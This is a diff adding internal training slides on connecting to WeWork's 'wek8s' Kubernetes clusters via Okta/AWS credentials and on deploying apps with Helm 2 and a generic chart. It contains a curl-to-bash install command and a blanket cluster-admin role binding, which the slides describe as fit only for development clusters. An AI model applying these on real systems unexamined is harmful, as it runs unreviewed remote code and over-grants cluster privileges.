  - swarm/hostingregistry.md
  - swarm/testingregistry.md
  - swarm/btp-manual.md
  - swarm/swarmready.md
  - swarm/stacks.md
- |
  name: part-2

  class: title, self-paced

  Part 2
- - swarm/operatingswarm.md
#- swarm/netshoot.md
#- swarm/swarmnbt.md
  - swarm/ipsec.md
  - swarm/updatingservices.md
  - swarm/rollingupdates.md
#- swarm/healthchecks.md
  - swarm/nodeinfo.md
  - swarm/swarmtools.md
- - swarm/security.md
  - swarm/secrets.md
  - swarm/encryptionatrest.md
  - swarm/leastprivilege.md
  - swarm/apiscope.md
#- swarm/logging.md
#- swarm/metrics.md
  - swarm/stateful.md
  - swarm/extratips.md
- shared/thankyou.md
- swarm/links.md
234
slides/wek8s/connecting.md
Normal file
@@ -0,0 +1,234 @@
|
||||
name: connecting-to-wek8s
|
||||
|
||||
## Connecting to wek8s
|
||||
|
||||
- Let's see what it entails to connect to one of our wek8s clusters
|
||||
|
||||
- We need an account on https://we.okta.com/
|
||||
|
||||
(with access to "Dev AWS" environment)
|
||||
|
||||
- We need an account on https://quay.io/
|
||||
|
||||
(with access to images
|
||||
[wework/okta-aws](https://quay.io/repository/wework/okta-aws)
|
||||
and
|
||||
[wework/wek8s-tools](https://quay.io/repository/wework/wek8s-tools))
|
||||
|
||||
- We will obtain AWS credentials through Okta
|
||||
|
||||
- Then, we will use these AWS credentials to obtain Kubernetes credentials
|
||||
|
||||
(because the wek8s cluster we will connect to is using AWS EKS under the hood)
|
||||
|
||||
.warning[These instructions are up-to-date as of May 2019, but may change in the future.]
|
||||
|
||||
---
|
||||
|
||||
## Pulling the okta-aws and wek8s-tools images

- If we are already logged into quay.io, we can skip this step
  <br/>
  (the images will be pulled automatically when we need them)

- ... But doing it now makes it easier to troubleshoot registry issues
  <br/>
  (if we get an error *now*, we know where it's coming from)

.exercise[

- Log into quay.io:
  ```bash
  docker login quay.io
  ```

- Pull both images:
  ```bash
  docker pull quay.io/wework/okta-aws
  docker pull quay.io/wework/wek8s-tools:0.3.2
  ```

]

---

## Obtaining AWS credentials

- We will use okta-aws to obtain our AWS credentials

- For convenience, we will use a pre-built okta-aws container

.warning[If we already have credentials in `~/.aws`, this may overwrite them!]

.exercise[

- Run okta-aws to obtain AWS credentials and store them in `~/.aws`:
  ```bash
  docker run -it --rm -v ~/.aws:/package/.aws quay.io/wework/okta-aws
  ```

- Select the `Dev` environment at the first prompt

- Enter your Okta email, password, and MFA code

]

---

## Verifying account and role

The last lines of output of okta-aws will confirm which account we logged into.

For the `Dev` account, this should look like this:

```
Account: 681484253316
Role: AWS-Tech-User
Profile: saml
```

... And a few files have been updated in `~/.aws`, including `~/.aws/credentials`.

Q: How did the container update `~/.aws` on our machine?

A: Because we mounted that directory into the container with `-v`.

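For reference, here is a minimal sketch of what the `saml` profile written to `~/.aws/credentials` looks like (the key names are the standard AWS CLI ones; the values below are placeholders, and SAML-based credentials also include a session token):

```
[saml]
aws_access_key_id = AKIA................
aws_secret_access_key = ....................
aws_session_token = ....................
```
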
---

## Running wek8s-tools

- Two more steps are necessary to obtain Kubernetes cluster credentials

- For simplicity, we are going to use a "Swiss Army knife" image, wek8s-tools

- This image contains the tools to obtain the Kubernetes credentials, and many others

  (including kubectl, helm, ...)

.exercise[

- Start a container using the wek8s-tools image:
  ```bash
  docker run --rm -v ~/.aws:/root/.aws -it quay.io/wework/wek8s-tools:0.3.2 sh
  ```

]

*We are using the `-v` option again, to mount our fresh AWS credentials into this container.*

---

## Generating kubeconfig

- The next step is to generate a kubeconfig file with:

  - the address of the wek8s cluster we want to use

  - instructions to use the AWS IAM authenticator plugin

- This is done with the `deploy_helper` binary

.exercise[

- Generate the kubeconfig file:
  ```bash
  deploy_helper fetch_reqs --env wek8s-phoenix --namespace k8s-training
  ```

]

We now have a `~/.kube/config` file (in the container).

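The interesting part of that kubeconfig is the user entry: it tells kubectl to obtain tokens by invoking the AWS IAM authenticator. A minimal sketch of what that section typically looks like for an EKS cluster (the cluster ID `wek8s-phoenix` is illustrative; the exact fields may differ):

```yaml
users:
- name: wek8s-phoenix
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1alpha1
      command: aws-iam-authenticator
      args: ["token", "-i", "wek8s-phoenix"]
```
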
---

## Using the cluster

- Let's get a shell on this cluster!

.exercise[

- Run a one-time Pod with an Alpine container:
  ```bash
  kubectl -n k8s-training run --restart=Never --rm -it test-$RANDOM --image=alpine
  ```

- Find out the node's IP address:
  ```bash
  apk add curl
  curl https://canihazip.com/s
  ```

- Exit when done

]

---

## Using local tools

.warning[Do not run the commands in this slide! This is not an exercise ☺]

- What if we wanted to use our local tools, instead of the wek8s-tools image?

- First, we would need to install the AWS IAM authenticator plugin

  (see the [AWS EKS documentation](https://docs.aws.amazon.com/eks/latest/userguide/install-aws-iam-authenticator.html) for instructions)

- Then, we would need to generate the kubeconfig file:
  ```bash
  docker run --rm -v ~/.aws:/root/.aws -v ~/.kube-wek8s:/root/.kube \
         quay.io/wework/wek8s-tools:0.3.2 \
         deploy_helper fetch_reqs --env wek8s-phoenix --namespace k8s-training
  ```

- This would generate the file `~/.kube-wek8s/config`

---

## Permission issues

.warning[Do not run the commands in this slide! This is not an exercise ☺]

- If you use Docker Desktop (on Windows or macOS), you should be all set

- Otherwise (on Linux or Docker Toolbox), the file belongs to `root`, and you will need to fix its permissions:
  ```bash
  chown -R $USER ~/.kube-wek8s
  ```

---

## Connecting to wek8s with local tools

.warning[Do not run the commands in this slide! This is not an exercise ☺]

- We would need to tell kubectl (and other tools) to use the file we generated:
  ```bash
  export KUBECONFIG=~/.kube-wek8s/config
  ```

- Then we could run a couple of simple commands to test the connection:
  ```bash
  kubectl version
  kubectl get svc -n default kubernetes
  ```

---

## Deploying DockerCoins on wek8s

.warning[Do not run the commands in this slide! This is not an exercise ☺]

- We could deploy DockerCoins like this:
  ```bash
  git clone https://github.com/jpetazzo/kubercoins
  kubectl -n k8s-training apply -f kubercoins
  ```

- To access the web UI, we would need an Ingress

  (more on that later)

- Rather than applying YAML directly, we would use Helm charts

  (more on that later)
667
slides/wek8s/helm.md
Normal file
@@ -0,0 +1,667 @@
# Managing stacks with Helm

- We created our first resources with `kubectl run`, `kubectl expose` ...

- We have also created resources by loading YAML files with `kubectl apply -f`

- For larger stacks, managing thousands of lines of YAML is unreasonable

- These YAML bundles need to be customized with variable parameters

  (e.g.: number of replicas, image version to use ...)

- It would be nice to have an organized, versioned collection of bundles

- It would be nice to be able to upgrade/rollback these bundles carefully

- [Helm](https://helm.sh/) is an open source project offering all these things!

---

## Helm concepts

- `helm` is a CLI tool

- `tiller` is its companion server-side component

- A "chart" is an archive containing templatized YAML bundles

- Charts are versioned

- Charts can be stored on private or public repositories

---

## Helm 2 / Helm 3

- Helm 3.0.0-alpha.1 was released on May 15th, 2019

- Helm 2 is still the stable version (and will be for a while)

- Helm 3 removes Tiller (which simplifies permission management)

- There are many other, smaller changes

  (see the [Helm release changelog](https://github.com/helm/helm/releases/tag/v3.0.0-alpha.1) for the full list!)

---

## Installing Helm

- If the `helm` CLI is not installed in your environment, install it

.exercise[

- Check if `helm` is installed:
  ```bash
  helm
  ```

- If it's not installed, run the following command:
  ```bash
  curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | bash
  ```

]

---

## Installing Tiller

- Tiller is composed of a *service* and a *deployment* in the `kube-system` namespace

- They can be managed (installed, upgraded...) with the `helm` CLI

.exercise[

- Deploy Tiller:
  ```bash
  helm init
  ```

]

If Tiller was already installed, don't worry: this won't break it.

At the end of the install process, you will see:

```
Happy Helming!
```

---

## Fix account permissions

- Helm's permission model requires us to tweak permissions

- In a more realistic deployment, you might create per-user or per-team
  service accounts, roles, and role bindings (see the sketch after this slide)

.exercise[

- Grant the `cluster-admin` role to the `kube-system:default` service account:
  ```bash
  kubectl create clusterrolebinding add-on-cluster-admin \
          --clusterrole=cluster-admin --serviceaccount=kube-system:default
  ```

]

(Defining the exact roles and permissions on your cluster requires
a deeper knowledge of Kubernetes' RBAC model. The command above is
fine for personal and development clusters.)

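For reference, a slightly more scoped setup gives Tiller its own service account instead of piggybacking on `kube-system:default`. A minimal sketch (this still grants `cluster-admin`; a production setup would use narrower roles):

```bash
kubectl -n kube-system create serviceaccount tiller
kubectl create clusterrolebinding tiller \
        --clusterrole=cluster-admin --serviceaccount=kube-system:tiller
helm init --service-account tiller
```
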
---

## Repositories

- A repository is a remote server hosting a number of charts

  (any HTTP server can be a chart repository)

- Repositories are identified by a local name

- We can add as many repositories as we need

.exercise[

- List the repositories currently available:
  ```bash
  helm repo list
  ```

]

When we install Helm, it automatically configures a repository called `stable`.
<br/>
(Think of it like "Debian stable", for instance.)

---

## View available charts

- We can view available charts with `helm search` (and an optional keyword)

.exercise[

- View all available charts:
  ```bash
  helm search
  ```

- View charts related to `prometheus`:
  ```bash
  helm search prometheus
  ```

]

---

## Viewing installed charts

- Helm keeps track of what we've installed

.exercise[

- List installed Helm charts:
  ```bash
  helm list
  ```

]

---

## Adding the WeWork repository

- The generic syntax is `helm repo add <nickname> <url>`

- We have a number of charts in Artifactory

- Since Artifactory is password-protected, we need to add `--username`

.exercise[

- Add the WeWork repository (replace `jdoe` with your own username):
  ```bash
  helm repo add wework https://wework.jfrog.io/wework/helm/ --username=jdoe
  ```

- When prompted, provide your password

]

---

## Looking at the WeWork repository

- Let's have a look at the charts in this repository

.exercise[

- Search for the repository name:
  ```bash
  helm search wework
  ```

]

---

## What's next?

- We could *install an existing application that has already been packaged*:

  `helm install wework/moonbase-climate-control`

  (sorry folks, that one doesn't exist [yet](https://disruption.medium.com/))

- We could *create a chart from scratch*:

  `helm create my-wonderful-new-app`

  (this creates a directory named `my-wonderful-new-app` with a barebones chart)

- We could do something in between: *install an app using a generic chart*

  (let's do that!)

---

## The wek8s generic service chart

- There is ~~an app~~ a chart for that!

.exercise[

- Look for `generic service`:
  ```bash
  helm search generic service
  ```

]

- The one that we want is `wework/wek8s-generic-service`

---

## Inspecting a chart

- Before installing a chart, we can check its description, README, etc.

.exercise[

- Look at all the available information:
  ```bash
  helm inspect wework/wek8s-generic-service
  ```

  (that's way too much information!)

- Look at the chart's description:
  ```bash
  helm inspect chart wework/wek8s-generic-service
  ```

]

---

## Using the wek8s generic chart

- We are going to download the chart's `values.yaml`

  (a file showing all the possible parameters for that chart)

- We are going to set the parameters we need, and discard the ones we don't

- Then we will install DockerCoins using that chart

---

## Dumping the chart's values

- Let's download the chart's `values.yaml`

- Then we will edit it to suit our needs

.exercise[

- Dump the chart's values to a YAML file:
  ```bash
  helm inspect values wework/wek8s-generic-service > values-rng.yaml
  ```

]

---

## Editing the chart's values

Edit `values-rng.yaml` and keep only this:

```yaml
appName: rng
replicaCount: 1
image:
  repository: dockercoins/rng
  tag: v0.1
service:
  enabled: true
  ports:
  - port: 80
    containerPort: 80
```

---

## Deploying the chart

- We can now install a *release* of the generic service chart using these values

- We will do that in a separate namespace (to avoid colliding with other resources)

.exercise[

- Switch to the `happyhelming` namespace:
  ```bash
  kubectl config set-context --current --namespace=happyhelming
  ```

- Install the `rng` release:
  ```bash
  helm install wework/wek8s-generic-service --name=rng --values=values-rng.yaml
  ```

]

Note: Helm will automatically create the namespace if it doesn't exist.

---

## Testing what we did

- If we were directly on the cluster, we could curl the service's ClusterIP

- But we're *not* on the cluster, so we will use `kubectl port-forward`

.exercise[

- Create a port forwarding to access port 80 of Deployment `rng`:
  ```bash
  kubectl port-forward deploy/rng 1234:80 &
  ```

- Confirm that RNG is running correctly:
  ```bash
  curl localhost:1234
  ```

- Terminate the port forwarder:
  ```bash
  kill %1
  ```

]

---

## Deploying the other services

- We need to create the values files for the other services:

  - `values-hasher.yaml` → almost identical (just change the name and image)

  - `values-webui.yaml` → same

  - `values-redis.yaml` → same, but adjust the port number (see the sketch below)

  - `values-worker.yaml` → same, but we can even remove the `service` part

- Then create all these services, using these YAML files

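For instance, `values-redis.yaml` could look like this sketch (same schema as `values-rng.yaml`; the image repository and tag are assumptions, and Redis listens on its standard port 6379):

```yaml
appName: redis
replicaCount: 1
image:
  repository: redis
  tag: latest
service:
  enabled: true
  ports:
  - port: 6379
    containerPort: 6379
```
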
---

# Exercise — deploying an app with the wek8s generic chart

.exercise[

- Create the 4 YAML files mentioned previously

- Install 4 Helm releases (one for each YAML file)

- What do we see in the logs of the worker?

]

---

## Troubleshooting

- We should see errors like this:
  ```
  Error -2 connecting to redis:6379. Name does not resolve.
  ```

- Why?

--

- Hint: `kubectl get services`

--

- Our services are named `redis-service`, `rng-service`, etc.

- Our code connects to `redis`, `rng`, etc.

- We need to drop the extra `-service`

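To illustrate, `kubectl get services` should show something along these lines (the ClusterIP and AGE values are placeholders):

```
NAME             TYPE        CLUSTER-IP   EXTERNAL-IP   PORT(S)    AGE
hasher-service   ClusterIP   10.100.x.x   <none>        80/TCP     5m
redis-service    ClusterIP   10.100.x.x   <none>        6379/TCP   5m
rng-service      ClusterIP   10.100.x.x   <none>        80/TCP     5m
webui-service    ClusterIP   10.100.x.x   <none>        80/TCP     5m
```
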
---

## Editing a chart

- To edit a chart, we can push a new version to the repository

- But there is a much simpler and faster way

- We can use Helm to download the chart locally, make changes, and apply them

- This also works when creating / developing a chart

  (we don't need to push it to the repository to try it out)

---

## Before diving in ...

.warning[Before editing or forking a generic chart like this one ...]

- Have a conversation with the authors of the chart

- Perhaps they can suggest other options, or adapt the chart

- We will edit the chart here, as a learning experience

- It may or may not be the right course of action in the general case!

---

## Download the chart

.exercise[

- Fetch the generic service chart to have a local, editable copy:
  ```bash
  helm fetch wework/wek8s-generic-service --untar
  ```

- This creates the directory `wek8s-generic-service`

- Have a look!

]

---

## Chart structure

Here is the structure of the directory containing our chart:

```
$ tree wek8s-generic-service/
wek8s-generic-service/
├── Chart.yaml
├── migrations
│   └── ...
├── README.md
├── templates
│   ├── _appContainer.yaml
│   ├── configmaps.yaml
│   ├── ... more YAML ...
│   ├── ... also, some .tpl files ...
│   ├── NOTES.txt
│   ├── ... more more YAML ...
│   └── ... and more more .tpl files
└── values.yaml
```

---

## Explanations

- `Chart.yaml` → the chart's short description and metadata

- `README.md` → longer description

- `values.yaml` → the file we downloaded earlier

- `templates/` → files in this directory will be *rendered* when the chart is installed

  - after rendering, each file is treated as a Kubernetes resource YAML file

  - ... except the ones starting with an underscore (these contain templates)

  - ... and except `NOTES.txt`, which is shown at the end of the deployment

Note: the file extension doesn't really matter; the leading underscore does.

---

## Templates details

- Helm uses an extension of the Go template package

- This means that the files in `templates/` will be peppered with `{{ ... }}`

- For instance, this is an excerpt of `wek8s-generic-service/templates/service.yaml`:
  ```yaml
  metadata:
    name: {{ .Values.appName }}-service
    labels:
      app: {{ .Values.appName }}
  ```

- `{{ .Values.appName }}` will be replaced by the `appName` field from the values YAML

- For more details about the templating system, see the [Helm docs](https://helm.sh/docs/chart_template_guide/)

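For example, with the `values-rng.yaml` we wrote earlier (`appName: rng`), that excerpt renders to:

```yaml
metadata:
  name: rng-service
  labels:
    app: rng
```
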
---

## Editing the templates

- Let's remove the trailing `-service` in the service definition

- Then, we will roll out that change

.exercise[

- Edit the file `wek8s-generic-service/templates/service.yaml`

- Remove the `-service` suffix (see the diff below)

- Roll out the change to the `redis` release:
  ```bash
  helm upgrade redis wek8s-generic-service
  ```

]

- We used `upgrade` instead of `install` this time

- We didn't need to pass the YAML file with the values again

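The edit in `service.yaml` amounts to something like this:

```
-  name: {{ .Values.appName }}-service
+  name: {{ .Values.appName }}
```
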
---

## Viewing our changes

- If everything went well, we have "fixed" the `redis` service

- The `worker` should now be able to contact `redis`

.exercise[

- Check the logs of the `worker`:
  ```bash
  kubectl logs deploy/worker --tail 10 --follow
  ```

]

- Alright, now we need to fix `rng`, `hasher`, and `webui` the same way

---

## Fixing the other services

- We don't need to download the chart or edit it again

- We can use the same chart for the other services

.exercise[

- Upgrade `rng`, `hasher`, and `webui` with the updated chart (as shown below)

- Confirm that the `worker` works correctly

  (it should say, "X units of work done ...")

]

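Assuming the release names match the service names (as in the previous steps), the upgrades would look like this:

```bash
helm upgrade rng wek8s-generic-service
helm upgrade hasher wek8s-generic-service
helm upgrade webui wek8s-generic-service
```
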
---

## Extra steps

(If time permits ...)

.exercise[

- Set up a `port-forward` to view the web UI

- Scale the `worker` by updating the `replicaCount`

]

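One possible way to do both, sketched under two assumptions: the `webui` service listens on port 80 (like `rng`), and we pass `--values` again so that `--set` doesn't erase the other values:

```bash
kubectl port-forward deploy/webui 8080:80 &
curl localhost:8080
helm upgrade worker wek8s-generic-service --values=values-worker.yaml --set=replicaCount=10
```
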
---

## Exposing a web application

- How do we expose the web UI with a proper URL?

- We will need to use an *Ingress*

- More on that later!

---

## If we wanted to submit our changes

- The source of the wek8s-generic-service chart is in the following GitHub repository:

  https://github.com/WeConnect/WeK8s-charts

  (along with many other charts)

---

class: extra-details

## Good to know ...

- If we don't specify `--name` when running `helm install`, a name is generated

  (like `wishful-elephant` or `nihilist-alligator`)

- If we want to install-or-upgrade, we can use `helm upgrade --install`:

  `helm upgrade <name> <chart> --install --values=...`

- If we only want to set a few values, we can use `--set`, for instance:

  `helm upgrade redis wework/wek8s-generic-service --values=... --set=replicaCount=5`

  (we can use `--set` multiple times if needed)

.warning[If we specify `--set` without `--values`, it erases all the other values!]

---

class: extra-details

## If the first deployment fails

- If the first deployment of a release fails, it will be in an inconsistent state

- Further attempts to `helm install` or `helm upgrade` will fail

- To fix the problem, there are two solutions:

  - `helm delete --purge` that release

  - `helm upgrade --force` that release

- This only applies to the first deployment

  (i.e., Helm knows how to recover if a subsequent deployment fails)